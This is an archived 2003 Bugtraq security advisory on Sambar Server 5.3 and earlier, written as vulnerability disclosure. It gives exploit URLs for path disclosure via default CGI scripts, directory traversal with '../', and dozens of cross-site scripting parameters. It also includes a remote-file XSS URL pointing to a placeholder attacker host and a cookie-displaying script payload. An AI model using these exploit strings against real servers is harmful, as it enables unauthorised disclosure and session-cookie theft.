Home page logo
/

bugtraq logo Bugtraq mailing list archives

[SCSA-012] Multiple vulnerabilities in Sambar Server
From: "Grégory" Le Bras <gregory.lebras () security-corporation com>
Date: 27 Mar 2003 17:26:19 -0000



________________________________________________________________________

Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior 
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional 
servers with features rivaling other commercial products selling 
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000, 
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net) 


DETAILS & EXPLOITS
________________________________________________________________________


¤ Path Disclosure :

Sambar default's installation of the CGI bin directory contains
a testcgi.exe and a environ.pl that allows remote users to view
information regarding the operating system and 
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

http://[target]/cgi-bin/environ.pl

http://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl : 
--------------

Sambar Server CGI Environment Variables 
GATEWAY_INTERFACE: CGI/1.1 
PATH_INFO: 
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
QUERY_STRING: 
REMOTE_ADDR: 127.0.0.1 
REMOTE_HOST: 
REMOTE_USER: 
REQUEST_METHOD: GET 
DOCUMENT_NAME: environ.pl 
DOCUMENT_URI: /cgi-bin/environ.pl 
SCRIPT_NAME: /cgi-bin/environ.pl 
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
SERVER_NAME: localhost 
SERVER_PORT: 80 
SERVER_PROTOCOL: HTTP/1.1 
SERVER_SOFTWARE: SAMBAR 
CONTENT_LENGTH: 0 
CONTENT: 


- testcgi.exe :
---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING 
PATH_INFO 
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
SCRIPT_NAME /cgi-bin/testcgi.exe 
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
DOCUMENT_ROOT C:/sambar53/docs/ 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
REMOTE_ADDR 127.0.0.1 
REMOTE_HOST 
SERVER_NAME localhost 
SERVER_PROTOCOL HTTP/1.1 
SERVER_SOFTWARE SAMBAR 
CONTENT_TYPE 

----------------------------


¤ Directory Disclosure :

Other security vulnerabilities was found in Sambar which allow an
attacker to reveal the content of the files and the directories 
on the web server, even if it should not be revealed.

These vulnerabilities can be simply exploited by requesting a 
specially crafted URL utilizing iecreate.stm and ieedit.stm
application with a '../' appended.

- Exploits :

http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../


----------------------------


¤ Cross Site Scripting :

Many exploitable bugs was found on Sambar Server which cause script
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability" is 
present in many section of the web site, an attacker can input 
specially crafted links and/or other malicious scripts.

- Exploits : 

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

http://[target]/netutils/whodata.stm?sitename=[hostile_code]

http://[target]/netutils/findata.stm?user=[hostile_code]

http://[target]/netutils/findata.stm?host=[hostile_code]

http://[target]/isapi/testisa.dll?check1=[hostile_code]

http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

http://[target]/cgi-bin/testcgi.exe?[hostile_code]


- An other Cross Site Scripting can be exploited with a 
remote file where's include the hostile code like this :

http://[target]/sysuser/docmgr/ieedit.stm?url=http://
[attacker]/hostile_file.htm


The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by <>)


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS 
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- http://www.security-corp.org/index.php?ink=4-15-1

- Version Française :
http://www.security-corporation.com/index.php?id=advisories&a=012-FR


------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
------------------------------------------------------------------------



  By Date           By Thread  

Current thread:
  • [SCSA-012] Multiple vulnerabilities in Sambar Server Grégory (Mar 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]